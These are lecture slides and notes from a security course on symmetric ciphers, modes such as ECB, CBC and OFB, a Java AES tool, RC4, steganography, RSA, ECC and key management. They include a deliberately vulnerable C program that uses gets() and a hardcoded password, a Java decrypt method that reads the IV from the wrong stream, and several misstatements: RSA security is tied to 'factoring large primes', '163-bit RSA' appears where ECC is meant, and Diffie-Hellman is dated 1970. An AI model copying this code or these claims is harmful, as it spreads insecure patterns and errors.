Design of DES, Triple DES algorithms public Security not dependent on secrecy of implementation But rather on secrecy of key Benefits of Keys: Easy to replace if compromised Increasing size by one bit, doubles attacker’s work If invent own algorithm, make it public! Rely on algorithmic properties (math), not obscurity.

Electronic Code Book Encrypting more data: ECB encrypt blocks of data in a large document Leaks info about structure of document (e.g. repeated plaintext blocks) DES P1 K C1 P2 C2 Pn Cn … So far, we have covered three block ciphers, DES, Triple DES, and AES that can be used to encrypt 64, 128, 192, or 256-bit blocks of plaintext. They are called block ciphers because they take input blocks of 64, 128- etc. numbers of bits. However, we haven’t really talked about how to encrypt larger numbers of bits. Let’s say, for example, that we have a one megabyte document of plaintext that we would like to encrypt with a 64-bit key using DES. One megabyte is bit blocks. We could take each of these 64-bit blocks of plaintext input and independently run each of them through DES to produce bit blocks of ciphertext. This technique is called ECB, or Electronic Code Book, based encryption. It is as if we are looking up each 64-bit plaintext block in a (very large) “electronic code book” to determine what the corresponding ciphertext should be. There is a problem with this form of encryption using block ciphers. The problem is that it is likely that some of the 64-bit plaintext blocks are repeated many times in the one megabyte document. For instance, if the document is simply text, and the word “security” appears in the document multiple times (aligned on 64-bit boundaries) then the exact same ciphertext will appear in the encrypted document multiple times as well. This leaks some information about the structure of the document to the attacker. We would ideally like the encrypted document to look like completely random garble to the attacker, such that the probability that any bit in the encrypted document is a 1 (or is a 0) is ½. To achieve this, we should not use this “electronic code book” method of concatenating ciphertext blocks. Instead of having each block of ciphertext only be dependent upon one block of plaintext, we might like to have each block of ciphertext be dependent upon all of the previous ciphertext, so that we can hide such patterns. Problem: someone can tell if Pi = Pj because Ci will equal Cj.

12.1.5. Review of XOR Exclusive OR (either x or y but not both)
Special Properties: x XOR y = z z XOR y = x x XOR z = y x y x XOR y 1

12.1.5. Cipher Block Chaining … CBC: uses XOR, no patterns leaked!
Each ciphertext block depends on prev block DES P1 K C1 P2 C2 Pn Cn … + IV CBC, or Cipher Block Chaining, accomplishes this. In CBC, we XOR the previous block of ciphertext with the current plaintext block to produce a ciphertext block. By doing this, each ciphertext block is dependent on all previous ciphertext blocks as well as the current plaintext block, and it thereby hides such patterns in the encrypted text. Now, even if the word “security” appears in the plaintext multiple times aligned on 8-byte boundaries, the ciphertext for the word “security” will be different each time in the encrypted version of our file. Solution: Make C[i+1] dependent upon C[1]…C[i]. Other block chaining methods exist: CFB: Cipher Feedback OFB: Output Feedback We won’t cover them here… see Schneier’s book.

12.1.5. Output Feedback (OFB) … Makes block cipher into stream cipher
Like CBC, but do XOR after encryption AES P1 K C1 C2 Cn … + IV P2 Pn

12.1.6. AES Code Example Example Java Class: AESEncrypter
Command-line utility: Create AES key Encrypt & Decrypt with key AES in CBC mode Arguments: <command> <keyfile> command = createkey|encrypt|decrypt Input/output from stdin and stdout

Using AESEncrypter Alice generates a key and encrypts a message: She gives Bob mykey over secure channel, then can send ciphertext over insecure channel Bob can decrypt Alice’s message with mykey: $ java AESEncrypter createkey mykey $ echo "Meet Me At Central Park" | java AESEncrypter encrypt mykey > ciphertext $ java com.learnsecurity.AESEncrypter decrypt mykey < ciphertext Meet Me At Central Park

12.1.6. AESEncrytper: Members & Constructor
/* Import Java Security & Crypto packages, I/O library */ public class AESEncrypter { public static final int IV_SIZE = 16; // 128 bits public static final int KEY_SIZE = 16; // 128 bits public static final int BUFFER_SIZE = 1024; // 1KB Cipher cipher; /* Does encryption and decryption */ SecretKey secretKey; AlgorithmParameterSpec ivSpec; /* Initial Value – IV */ byte[] buf = new byte[BUFFER_SIZE]; byte[] ivBytes = new byte [IV_SIZE]; /* inits ivSpec */ public AESEncrypter(SecretKey key) throws Exception { cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); /* Use AES, pad input to 128-bit multiple */ secretKey = key; } // ... Methods Follow ...

12.1.6. AESEncrypter: encrypt()
public void encrypt(InputStream in, OutputStream out) throws Exception { ivBytes = createRandBytes(IV_SIZE); // create IV & write to output out.write(ivBytes); ivSpec = new IvParameterSpec(ivBytes); cipher.init(Cipher.ENCRYPT_MODE, secretKey, ivSpec); // cipher initialized to encrypt, given secret key, IV // Bytes written to cipherOut will be encrypted CipherOutputStream cipherOut = new CipherOutputStream(out, cipher); // Read in the plaintext bytes and write to cipherOut to encrypt int numRead = 0; while ((numRead = in.read(buf)) >= 0) // read plaintext cipherOut.write(buf, 0, numRead); // write ciphertext cipherOut.close(); // padded to 128-bit multiple }

12.1.6. AESEncryptor: decrypt()
public void decrypt(InputStream in, OutputStream out) throws Exception { // read IV first System.in.read(ivBytes); ivSpec = new IvParameterSpec(ivBytes); cipher.init(Cipher.DECRYPT_MODE, secretKey, ivSpec); // cipher initialized to decrypt, given secret key, IV // Bytes read from in will be decrypted CipherInputStream cipherIn = new CipherInputStream(in, cipher); // Read in the decrypted bytes and write the plaintext to out int numRead = 0; while ((numRead = cipherIn.read(buf)) >= 0) // read ciphertext out.write(buf, 0, numRead); // write plaintext out.close(); }

AESEncryptor: main() public static void main (String[] args) throws Exception { if (args.length != 2) usage(); // improper usage, print error String operation = args[0]; // createkey|encrypt|decrypt String keyFile = args[1]; // name of key file if (operation.equals("createkey")) { FileOutputStream fos = new FileOutputStream(keyFile); KeyGenerator kg = KeyGenerator.getInstance("AES"); kg.init(KEY_SIZE*8); // key size in bits SecretKey skey = kg.generateKey(); fos.write(skey.getEncoded()); // write key fos.close(); } else { byte[] keyBytes = new byte[KEY_SIZE]; FileInputStream fis = new FileInputStream(keyFile); fis.read(keyBytes); // read key SecretKeySpec keySpec = new SecretKeySpec(keyBytes, "AES"); AESEncrypter aes = new AESEncrypter(keySpec); // init w/ key if (operation.equals("encrypt")) { aes.encrypt(System.in, System.out); // Encrypt } else if (operation.equals("decrypt")) { aes.decrypt(System.in, System.out); // Decrypt } else usage(); // improper usage, print error }

12.1.6. AESEncryptor: Helpers
/* Generate numBytes of random bytes to use as IV */ public static byte[] createRandBytes(int numBytes) throws NoSuchAlgorithmException { byte[] bytesBuffer = new byte[numBytes]; SecureRandom sr = SecureRandom.getInstance("SHA1PRNG"); sr.nextBytes(bytesBuffer); return bytesBuffer; } /* Display error message when AESEncryptor improperly used */ public static void usage () { System.err.println("java com.learnsecurity.AESEncrypter " + "createkey|encrypt|decrypt <keyfile>"); System.exit(-1);

AESEncryptor Recap Java class KeyGenerator can be used to construct strong, cryptographically random keys AESEncrypter: no integrity protection Encrypted file could be modified So in practice, should tag on a MAC Use different keys for MAC and encryption Key Distribution is a challenge (c.f. Ch )

12.2. Stream Ciphers Much faster than block ciphers
Encrypts one byte of plaintext at a time Keystream: infinite sequence (never reused) of random bits used as key Approximates theoretical scheme: one-time pad, trying to make it practical with finite keys Until now, we have focused on talking about block-based symmetric encryption schemes in which blocks of plaintext are encrypted at a time. There does exist another class of symmetric encryption schemes called stream ciphers in which one bit of plaintext is encrypted at a time. Stream ciphers are, in general, much faster than block ciphers. They work by generating an infinite stream of key bits that are then simply XORed with the plaintext. When we first talked about XOR, we mentioned that it is not secure to simply XOR a key with some plaintext to encrypt it because if an attacker got a hold of some plaintext and its corresponding ciphertext, the attacker could simply XOR the two together to obtain the key. Hence, we could never use the same key bits twice. In a stream cipher,this is exactly what we make sure to do– a keystream generates an infinite sequence of random bits. The goal of a good stream cipher is to generate such a keystream of infinite random bits. In doing so, stream ciphers attempt to practically approximate a theorhetical encryption scheme called a one-time pad. A one-time pad is a cipher in which plaintext is XORed with a truly random stream of bits of the same length as the plaintext. (This is the reason that a one-time pad is impractical– carrying around a key that is the same size as the plaintext is impractical.) Also, note that a one time pad is called a one time pad because the key should be used exactly once! Why would we want to attempt to approximate such a impractical theorhetical encryption scheme? Well, Claude Shannon proved that a one time pads offer a property called “perfect secrecy.” Perfect secrecy means that under a brute force attack, every possible decryption is equally likely. Consider the following: let’s say that the attacker got a hold of some ciphertext that was encrypted using a one-time pad. The attacker could try a brute force attack where he tries decrypting using every possible combination of keys. The result that the attacker gets is a list containing one copy of every possible plaintext. The brute force attack yields absolutely no information about the plaintext. (This is, in general, not true of any imperfect cipher.) We will cover the most popular stream cipher, RC4. Since it is impractical to have Alice send Bob a key that is as long as the plaintext itself, RC4 uses a fixed size key as a “seed” that can be used to generate an infinite stream of key bits. We cover RC4 in just a second, but first we will review modular arithmetic, as modular arithmetic is used in the implementation of RC4 (as well as in RSA which we will see in the next lecture). One-time Pad: more info at (Excerpt) If the key is truly random, an xor-based one-time pad is perfectly secure against ciphertext-only cryptanalysis. This means an attacker can't compute the plaintext from the ciphertext without knowlege of the key, even via a brute force search of the space of all keys! Trying all possible keys doesn't help you at all, because all possible plaintexts are equally likely decryptions of the ciphertext. This result is true regardless of how few bits the key has or how much you know about the structure of the plaintext. To see this, suppose you intercept a very small, 8-bit, ciphertext. You know it is either the ASCII character 'S' or the ASCII character 'A' encrypted with a one-time pad. You also know that if it's 'S', the enemy will attack by sea, and if it's 'A', the enemy will attack by air. That's a lot to know. All you are missing is the key, a silly little 8-bit one-time pad. You assign your crack staff of cryptanalysts to try all bit one-time pads. This is a brute force search of the keyspace. The results of the brute force search of the keyspace is that your staff finds one 8-bit key that decrypts the ciphertext to 'S' and one that decrypts it to 'A'. And you still don't know which one is the actual plaintext. This argument is easilly generalized to keys (and plaintexts) of arbitrary length.

12.2.1 One-Time Pad Key as long as plaintext, random stream of bits
Ciphertext = Key XOR Plaintext Only use key once! Impractical having key the same size as plaintext (too long, incurs too much overhead) Theoretical Significance: “perfect secrecy” (Shannon) if key is random. Under brute-force, every decryption equally likely Ciphertext yields no info about plaintext (attacker’s a priori belief state about plaintext is unchanged)

12.2.2. RC4 Most popular stream cipher: 10x faster than DES
Fixed-size key “seed” to generate infinite stream State Table S that changes to create stream Ex: 256-bit key used to seed table (fill it) (Add some info about the intuition for the algorithm… this is contained in Schnier’s book.) RC4 heavily uses modular arithmetic to create a random keystream. The way that RC4 works is it uses an array, S, whose values it continuously changes to generate the key stream. The array is “seeded” with a “key” that fills the array initially. The RC4 algorithm used to generate the keystream is shown above. The values i, j, and t are counters that are used to index the array S. RC4 generates one byte of key bits each time the above algorithm is run. The newly generated key bits are stored in K. Counters i and j are initialized to 0. S is initialized to the value of the key that both Alice and Bob know of as the “key” which they use to generate the keystream. On each iteration, i is incremented by one, and j is set to the value of S[i] added to j. Then, the values in the positions S[i] and S[j] are swapped. T is given the value of S[i] and S[j],and the next bytes of key bits are S[t]. All additions are done mod 256. The counter i iterates through the entire array and makes sure that each byte of the array gets modified at least once every 256 steps. However, each byte can be modified more than once because of the swap step. See for more info. mod = modular arithmatic S-Box initialized as follows: First, forall i, S[i] = i. Let K[i] be the key array. (filled with the key, if key smaller than 255 bytes, then it is repeated) j=0; for i = 0 to 255 { j = (j + S[i] + K[i]) mod 256; swap (S[i],S[j]); } In the algorithm: i makes sure that every entry in the S-box eventually changes J “randomly” chooses a byte to swap i with i = (i + 1) mod 256 j = (j + S[i]) mod 256 swap (S[i],S[j]) t = (S[i]+S[j]) mod 256 K = S[t]

… and other ciphers… Source:

12.2.2. RC4 Pitfalls Never use the same key more than once!
Clients & servers should use different RC4 keys! C -> S: P XOR k [Eve captures P XOR k] S -> C: Q XOR k [Eve captures Q XOR k] Eve: (P XOR k) XOR (Q XOR k) = P XOR Q!!! If Eve knows either P or Q, can figure out the other Ex: Simple Mail Transfer Protocol (SMTP) First string client sends server is HELO Then Eve could decipher first few bytes of response

12.2.2. More RC4 Pitfalls Initial bytes of key stream are “weak”
Ex: WEP protocol in wireless standard is broken because of this Discard first bytes of stream Active Eavesdropper Could flip bit without detection Can solve by including MAC to protect integrity of ciphertext

12.3. Steganography All ciphers transform plaintext to random bits
Eve can tell Alice is sending sensitive info to Bob Conceal existence of secret message Use of a “covert channel” to send a message. So far, we have discussed symmetric cryptography. Before continuing our discussion of applied cryptography with asymmetric cryptography, we will briefly touch upon steganography. The symmetric ciphers that we have discussion so far all have one thing in common: they all seek to transform the plaintext into a random string of bits. If Alice sends a random strings of bits to Bob, then an Eavesdropper Eve may be able to infer that Alice is sending sensitive information to Bob. However, Alice may want to conceal the fact that she is sending sensitive information to Bob. Steganography is the study of techniques that Alice can use to send sensitive information to Bob that seeks to hide the fact that sensitive information is being transmitted. Steganographic techniques typically use a convert channel to send sensitive information from one part to the other. Consider the following message that Alice sends to Bob: “All the tools are carefully kept.” The message seems harmless enough, but within this message there is a covert channel that is being utilized to send a secret message. (Most steganography relies on security by obscurity.)

What is Steganography? Study of techniques to send sensitive info and hide the fact that sensitive info is being sent Ex: “All the tools are carefully kept” -> Attack Other Examples: Invisible ink, Hidden in Images Least significant bit of image pixels Modifications to image not noticeable by an observer Recipient can check for modifications to get message If we only pay attention to the first letter of each word in the sentence, we can see that these first letters spell out the word “ATTACK.” The first letter of each word is a covert channel that is being used to send a secret message. It may be hard for an eavesdropper, Eve, that is not aware of the covert channel to discern that Alice is really telling Bob to “attack” when the message seems to be concerned with tools. There are many other examples of steganography. Invisible ink pens that children use to send messages to each other is another example of steganography. A more serious approach that is used to transmit hidden messages as part of electronic pictures work as follows. Each pixel in a digital picture can be represented as a 8 bit color code, corresponding to a red, green, and blue value for that pixel. The first bits (also called the most significant bits) of each of the 8-bit components have the most significant effect on the color of the pixel. However, the least significant bit has only a very slight effect on the color of the pixel. One could change all of the least significant bits without affecting the average person’s perception of the entire image. So, one could use these bits to transmit a secret message. For example, if you switched the least significant bits of a black background in a digital image from 000 to 101, you would be able to transmit the secret message “101” from a party sending the image to the party receiving it, and any eavesdroppers would not necessarily be aware that a secret message was encoded in the least significant bits of all the pixels. Red Green Blue 101

12.3.2. Steganography vs. Cryptography
Key Advantage: when Alice & Bob don’t want Eve to know that they’re communicating secrets Disadvantages compared to encryption Essentially relying on security by obscurity Useless once covert channel is discovered High overhead (ratio of plain bits/secret bits high) Can be used together with encryption, but even more overhead (additional computation for both) The key advantage of steganographic techniques is that they allow Alice and Bob to exchange secrets without allowing third-parties to know that such secret messages are being exchanged. The key disadvantage is that steganographic techniques rely on obscurity for security. Once the covert channel is known to the third-party, the technique is useless. In addition, the other disadvantage of steganography is that even if the technique is unknown to the third-party, there is a high overhead for sending secret messages. In our previous example, only three bits per pixel could be used to send secret message. (The overhead is about 8 bits for each secret message bit that needs to be sent.) The more bits that are used as part of the covert channel the more percievable the alternations in color it might be to the third-party. The fewer bits that are used, the higher the overhead. Steganography can be used together with encryption to leverage some of the advantages of both. If a message is encrypted before it is inserted into a covert channel, Alice and Bob may be able to hide that they are communicating secret messages, and even if the third-party does figure out that there is a covert channel and obtain the contents of the secret message, the third-party may not be able to decrypt it. However, even by combining steganography with encryption, it is hard to eliminate the high overhead. This concludes this chapter, and in the next chapter we will cover asymmetric cryptography, a kind of cryptography in which Alice can Bob use two different keys, a public key and a private key, to exchange messages instead of just one key that Alice and Bob share.

Summary Cryptography: encode & decode messages
Applied to serve security goals (confidentiality) Symmetric Ciphers: Alice & Bob have same key Block Ciphers: DES, AES (128-bit blocks at a time) Stream Ciphers: OTP, RC4 (byte at a time, faster) Encrypting More Data: ECB & CBC Steganography: Attempt to hide that secrets are being communicated at all

CHAPTER 13 Asymmetric Key Cryptography

Agenda Problem with Symmetric Key Crypto: Alice & Bob have to agree on key! In 1970, Diffie & Hellman propose asymmetric or public key cryptography RSA & Elliptic Curve Cryptography (ECC) Certificate Authorities (CAs) Identity-Based Encryption (IBE) Authentication via Encryption

13.1. Why Asymmetric Key Cryptography?
So two strangers can talk privately on Internet Ex: Bob wants to talk to Alice & Carol secretly Instead of sharing different pairs of secret keys with each (as in symmetric key crypto) Bob has 2 keys: public key and private (or secret) key Alice and Carol can send secrets to Bob encrypted with his public key Only Bob (with his secret key) can read them

13.1. … To Mess With Poor Eve Source:

13.1. Public Key System Bob Alice Carol Denise Directory

13.1. The Public Key Treasure Chest
Public key = Chest with open lock Private key = Key to chest Treasure = Message Encrypting with public key Find chest with open lock Put a message in it Lock the chest Decrypting with private key Unlock lock with key Take contents out of the chest Another way to think of asymmetric encryption is as follows. When Bob gives out his public key, it is like him giving out an open, empty treasure chest. Anyone can put a message in the treasure chest and lock the treasure chest. However, Bob is the only one that can open the treasure chest because his private key is the key to the treasure chest.

13.1. Asymmetric Encryption
Alice encrypts a message with different key than Bob uses to decrypt Bob has a public key, kp, and a secret key, ks. Bob’s public key is known to Alice. Asymmetric Cipher: F-1(F(m,kp),ks) = m In this slide, we summarize how asymmetric cryptography works. If Alice wants to send a secret message to Bob, she first constructs her message, M. She then computes a ciphertext, C, using an asymmetric encryption scheme that takes the message to be encrypted and Bob’s public key as input. Remember that Bob’s public key is public and can be published in a directory so that is how Alice knows Bob’s public key. Alice sends the ciphertext to Bob. When Bob receives the ciphertext, he feeds the ciphertext and his private key to an asymmetric decryption algorithm to recover the message. Alice Bob 1. Construct m 2. Compute c= F(m,kp) 3. Send c to Bob c 4. Receive c from Alice 5. Compute d=F-1(c,ks) 6. m = d

13.2. RSA (1) Invented by Rivest/Shamir/Adelman (1978)
First asymmetric encryption algorithm Most widely known public key cryptosystem Used in many protocols (e.g., SSL, PGP, …) Number theoretic algorithm: security based on difficulty of factoring large prime numbers 1024, 2048, 4096-bit keys common After briefly introducing how symmetric ciphers in the last lecture, we talked about some examples of symmetric ciphers such as DES and AES. Now that we have talked about how asymmetric ciphers work in general, we will talk about two examples of them; namely, RSA and ECC. RSA is the first asymmetric encryption algorithm that we ever developed. Shortly after Diffie and Hellman published a paper about the idea of an asymmetric cipher, Rivest, Shamir, and Adelman, the R, S, and A, in RSA came up with an implementation of the idea. Even today, RSA is the most widely known and used asymmetric cipher. It is used in protocols such as SSL, CDPD, WTLS, PGP, and many others. SSL used for secure communication between web browsers and servers, we have already met. CDPD stands for Cellular Digital Packet Data, and it is a wireless data protocol. WTLS stands for Wireless Transport Layer security, and it is SSLs analog in the wireless web. So you get the point– RSA is widely used in many other protocols. The mathematical properties of the RSA algorithm are based on number theory, and we will go through a very high level overview of how it works in just a second. Its security of the algorithm depends on the difficulty of factoring large prime numbers. If it is difficult the factor large prime factors, it will be hard to break the mathematical properties of the algorithm. Common key sizes that are used with RSA are 1024, 2048, and 4096 bits. Keep in mind that since RSA is different than any other algorithm, these key sizes have not have a direct relation to the key sizes of symmetric algorithms (or even other asymmetric algorithms). That is, just because we might encrypt message with a 1024-bit RSA key, that does not mean that it is more or less “secure” in any way than encrypting a message using a 256-bit AES key. We can compare the strength of key sizes of different algorithms by measuring the expected amount of time it would take to successfully conduct a brute force attack on them, but in general it does not make much sense to directly compare the lengths of keys of two different algorithms.

13.2. RSA (2) Public Key Parameters: Private Key:
Large composite number n with two prime factors Encryption exponent e coprime to (n) = (p-1)(q-1) Private Key: Factors of n: p, q (n = pq) Decryption exponent d such that ed ´ 1 (mod (n)) Encryption: Alice sends c = me mod n Decryption: Bob computes m = cd mod n Euler’s Theorem: a(n) ´ 1 (mod n) Check: med ´ m ¢ m(n) ´ m (mod n)

13.3. Elliptic Curve Cryptography
Invented by N. Koblitz & V. Miller (1985) Based on hardness of elliptic curve discrete log problem Standardized by NIST, ANSI, IEEE for government, financial use Certicom, Inc. currently holds patent Small keys: 163 bits (<< 1024-bit RSA keys) Elliptic curve cryptography provides yet another way to build a public key cryptosystem. It was invented to by Neil Koblitz and Victor Miller independently at about the same time in Its discovery is much more recent than RSA. Elliptic curve cryptography is also based on number theory. Its security is not dependent upon the difficulty of factoring large prime numbers, but instead is based upon the difficulty of the elliptic curve discrete log problem. Since RSA has been around longer than ECC and mathematicians have had more time to look at attacks on RSA, we might say that RSA is more well understood than ECC. Nevertheless, ECC has started making an impact in real-world security systems, and that is why we mention it here. For example, ECC public-key crypto has been incorporated into WTLS, a wireless version of the SSL protocol. Since the mathematics of ECC are more complicated than that of RSA, were not going to cover them here, but you can consult Stallings if you are interested. The key thing to know about ECC-based public key crypto from a systems standpoint is that it allows us to do public key operations using must smaller keys than RSA allows us to do the same operations. Studies have been done which estimate that a 163-bit RSA is comparable in strength to a 1024-bit RSA key from the standpoint that it might take an attacker about the same amount of time to conduct a brute force attack on a 163-bit ECC key as it would take the attacker to conduct a brute force attack on a 1024-bit RSA key. Due to the smaller key sizes, ECC has some advantages over RSA for certain types of applications, such as wireless applications since wireless devices usually have less memory and computing resources than desktop PCs. A public company by the name of Certicom currently holds the patent for ECC-based public key crypto. As a result of the smaller key sizes, Unlike RSA, however, the security of the elliptic curve public-key cryptosystem is based on the difficulty of the discrete log problem, as opposed to the difficulty of factoring. What is the public key and what is the private key? More information on ECC at

13.3: RSA vs. ECC RSA Advantages: ECC Advantages:
Has been around longer; math well-understood Patent expired; royalty free Faster encryption ECC Advantages: Shorter key size Fast key generation (no primality testing) Faster decryption What are the key differences between RSA and ECC? Well, as we mentioned earlier, since RSA has been around earlier, it is probably more well-understood than ECC. RSA also used to be held under a patent by RSA Data Security, but that patent expired on September 20, 2000 so RSA can be used royalty free. However, you will still need to pay royalties to Certicom, Inc. if you want to use ECC. The third advantage that RSA provides, in general, faster encryption for a comparable key strength. (Usually, a small public key exponent such as e=3 or e=65537 is used with RSA because it makes verifying digital signatures very fast. We will talk about digital signatures shortly.) Looking at ECC, we see that its advantages are: a shorter key size for comparable cryptographic strength. In order to use public key crypto, a user first needs to generate a public/private key pair that satisfies certain mathematical properties. For RSA, we needed to find two large prime numbers that we could multiply together to “set up” the system. Remember, in RSA all operations we done mod n where n was the product of these two large primes. However, checking that a number that is thousands of digits long it not easy. (That is, it takes a while!) Since ECC public key systems do not require that we use such large prime numbers, we do not have to do this primality checking. As a result, generating public-private key pairs for new users is much faster with ECC. Finally, ECC allows us to do decryption faster than RSA for comparable key strength. For more info about the trade-offs between RSA and ECC, you may consult two research papers that were written by yours truly on my web site. Double check faster encryption faster / decryption business

13.4. Symmetric vs. Asymmetric Key Cryptography
Symmetric-Crypto (DES, 3DES, AES) Efficient (smaller keys / faster encryption) because of simpler operations (e.g. discrete log) Key agreement problem Online Asymmetric-Crypto (RSA, ECC) RSA 1000x slower than DES, more complicated operations (e.g. modular exponentiation) How to publish public keys? Requires PKI / CAs Offline or Online

13.5. Certificate Authorities
Trusted third party: CA verifies people’s identities Authenticates Bob & creates public key certificate (binds Bob’s identity to his public key) CA also revokes keys and certificates Certificate Revocation List: compromised keys Public Key Infrastructure (PKI): CA + everything required for public key encryption

13.6. Identity-Based Encryption
Ex: address as identity & public key Bob gets his private key from a generator (PKG) after authenticating himself via a CA Commercialized by Voltage Security (2002) Revoked Keys: concatenate current date to public key Then PKG doesn’t provide private key after date when compromised

13.7. Authentication with Encryption
Alice issues “challenge” message to person Random # (nonce) encrypted with Bob’s public key If person is actually Bob, he will be able to decrypt it { }PK(Bob) Bob Until this point, we have looked at all keys as being encryption keys. That is, whether we were talking about a symmetric encryption algorithm or an asymmetric encryption algorithm, DES or RSA, we talked about using a key of the appropriate length to do encryption or decryption. The most obvious application of encryption is to achieve confidentiality. However, encryption can be used for other applications as well. For example, we can use encryption to do authentication. This is how we would do it with a public key cryptosystem. If I believe that only Bob will have Bob’s private key, then if I want to check whether or not I am really communicating with Bob, I can encrypt a “challenge” message using Bob’s public key. The challenge message is just a regular message that might say something like “If you can read this, then say ‘BOO’!” If the person on the other end of the communication is able to read the message it must be cause that person has possession of Bob’s private key, and the person should respond by sending you the message “Boo!” If we believe that Bob is responsible, and has not given his private key to anybody else, and that Bob is also smart enough to have his systems protected so that his private key was not stolen, then we have the right to believe that we are actually communicating with Bob. Hence, we just used public-key encryption to authenticate Bob. That is, we used the public key encryption scheme to check that we are actually talking to Bob and nobody else. Alice Eve { }PK(Bob) ???

A Word of Caution In the previous example, as well as some other examples presented in later chapters, the simple toy protocols that we discuss are for instructive and illustration purposes only. They are designed to make concepts easy to understand, and are vulnerable to various types of attacks that we do not necessarily describe. Do not implement these protocols as is in software. For example, the simple “challenge” authentication method is vulnerable to a man-in-the-middle attack. Mallory gets a challenge from Alice, sends it to Bob She takes his response and returns it to Alice Bob needs to authenticate Alice as well

Summary Asymmetric Cryptography: Two Keys Examples: RSA, ECC
Public key published in directory Secret key known only to Bob Solves key exchange problem Examples: RSA, ECC PKI required: CAs, Trusted Third Parties Applications: IBE, Authentication, SSL…

CHAPTER 14 Key Management & Exchange

Agenda Key Management: process of generating, storing, agreeing upon and revoking keys Generation: How should new keys be created? Storage: How to securely store keys so they can’t be stolen? Agreement: How do 2 parties agree on a key to protect secrets?

14.1. Types of Keys Encryption keys can be used to accomplish different security goals Identity Keys Conversation or Session Keys Integrity Keys One Key, One Purpose: Don’t reuse keys! Because encryption can be used for purposes other than confidentiality, security systems use encryption in many places. We have seen encryption used to achieve confidentiality and authentication. However, encryption can also be used as a primitive to achieve other security goals as well. In some systems, when different algorithms are often used for different purposes, but all of these algorithms require us to use keys. As a result, it is often useful to make a distinction between different types of keys that are used for different purposes. Since asymmetric encryption is very costly/expensive (RSA encryption takes 1000 times as long as DES encryption), it is typically only used for authentication. Symmetric encryption, due to its relative efficiency, can be used for authentication as well as confidentiality purposes. Authentication typically happens once per connection set up between two parties, and some keys might be used in order to accomplish the authentication. Keys that are used to accomplish authentication are typically referred to as “identity” keys. Identity keys (such as a user’s private key) are generated by the principal whom that key authenticates. Since they are used to authenticate a principal, and the lifetime of a principal might be long (i.e., up to 100 years), we use key lengths that would generally not be break-able within that timeframe. On the other hand, we might use a key to encrypt the contents of a conversation with another party, and this type of key is often referred to as a “conversation key” or a “session key.” Since we may only care about protecting the contents of a particular conversation for say 1 year or 5 years, we can use a key length for a conversation key that is shorter than a identity key. In addition, either party may generate the conversation key (assuming that both parties are, to an extent, “trusted”), or the conversation key may partly be generated by each party.

14.1.1. Identity Keys Used to help carry out authentication
Authentication once per connection between two parties Generated by principal, long-lifetime (more bits) Bound to identity with certificate (e.g. public keys in asymmetric system)

14.1.2. Conversation or Session Keys
Helps achieve confidentiality Used after 2 parties have authenticated themselves to each other Generated by key exchange protocol (e.g. Diffie-Hellman algorithm) Short-lifetime (fewer bits)

Integrity Keys Key used to compute Message Authentication Codes (MACs) Alice and Bob share integrity key Can use to compute MACs on message Detect if Eve tampered with message Integrity keys used in digital signatures

14.2. Key Generation Key generated through algorithms (e.g. RSA)
Usually involves random # generation as a step But for IBE, also need PKG, master key Avoid weak keys (e.g. in DES keys of all 1s or 0s, encrypting twice decrypts) Don’t want keys stolen: After generation Don’t store on disk connected to network Also eliminate from memory (avoid core dump attack) Generating keys from passwords: Use password-based encryption systems (e.g. PKCS #5) to guard against dictionary attacks

14.2.1. Random Number Generation
Ex: Alice & Bob use RSA to exchange a secret key for symmetric crypto (faster) Alice generates random # k Sends to Bob, encrypted with his public key Then use k as key for symmetric cipher But if attacker can guess k, no secrecy Active eavesdropper can even modify/inject data into their conversation Problem: Generating hard to guess random #s

14.2.2. The rand() function How about using rand() function in C?
Uses linear congruential generator After some time, output repeats predictably Can infer seed based on few outputs of rand() Allows attacker to figure out all past & future output values No longer unpredictable Don’t use for security applications

Random Device Files Virtual devices that look like files: (e.g. on Linux) Reading from file provides unpredictable random bits generated based on events from booting /dev/random – blocks until random bits available /dev/urandom – doesn’t block, returns what’s there $ head -c 20 /dev/random > /tmp/bits # read 20 chars $ uuencode --base64 /tmp/bits printbits # encode, print begin-base printbits bj4Ig9V6AAaqH7jzvt9T60aogEo===== # random output

Random APIs Windows OS: CryptGenKey() – to securely generate keys Java: SecureRandom class in java.security package (c.f. AESEncrypter example, Ch. 12) Underlying calls to OS (e.g. CryptGenKey() for Windows or reads from /dev/random for Linux) No guarantees b/c cross-platform But better than java.util.Random

14.3. Key (Secret) Storage Secret to store for later use
Cryptographic key (private) Password or any info system’s security depends on Recall Kerchoff’s principle: security should depend not on secrecy of algorithm, but on secrecy of cryptographic keys Options for storing secrets?

Keys in Source Code Ex: Program storing a file on disk such that no other program can touch itMight use key to encrypt file: Where to store it? Maybe just embed in source code? Easy since you can use at runtime to decrypt. Can reverse-engineer binary to obtain the key (even if obfuscated) e.g. strings utility outputs sequence of printable chars in object code

14.3.1. Reverse-Engineering Key Leaked!
/* vault program (from 6.1.2) */ 1 int checkPassword() { 2 char pass[16]; 3 bzero(pass, 16); // Initialize 4 printf ("Enter password: "); 5 gets(pass); 6 if (strcmp(pass, "opensesame") == 0) 7 return 1; 8 else 9 return 0; 10 } 11 12 void openVault() { 13 // Opens the vault 14 } 15 16 main() { if (checkPassword()) { openVault(); printf ("Vault opened!"); } 21 } # partial output of printable # characters in object code $ strings vault Enter password: opensesame __main _impure_ptr calloc cygwin_internal dll_crt0__FP11per_process free gets malloc printf realloc strcmp GetModuleHandleA cygwin1.dll KERNEL32.dll Key Leaked!

14.3.2. Storing the Key in a File on Disk
Alternative to storing in source code, could store in file on disk Attacker with read access could Find files with high entropy (randomness) These would be candidate files to contain keys C.f. “Playing Hide and Seek with Stored Keys” (Shamir and van Someren)

“Hard to Reach” Places Store in Windows Registry instead of file? Part of OS that maintains config info Not as easy for average user to open But regedit can allow attacker (or slightly above-average user) to read the registry Also registry entries stored on disk Attacker with full read access can read them Registry not the best place to store secrets

14.3.4. Storing Secrets in External Devices (1)
Store secrets in device external to computer! Key won’t be compromised even if computer is Few options: smart card, HSMs, PDAs, key disks Smart Card (contains tamper-resistant chip) Limited CPU power, vulnerable to power attacks Must rely on using untrusted PIN readers Attacker observes power of circuits, computation times to extract bits of the key

Hardware Security Module (HSM) Device dedicated to storing crypto secrets External device, add-on card, or separate machine Higher CPU power, key never leaves HSM (generated and used there) PDA or Cell phone No intermediate devices like PIN readers More memory, faster computations Can have security bugs of their own

Key Disk USB, non-volatile memory, 2nd factor No CPU, not tamper-resistant No support for authentication Ex: IronKey, secure encrypted flash drive External Devices & Keys Allows key to be removed from host system Problem: connected to compromised host Advantage: if crypto operation done on device & key never leaves it, damage limited Can attack only while connected, can’t steal key

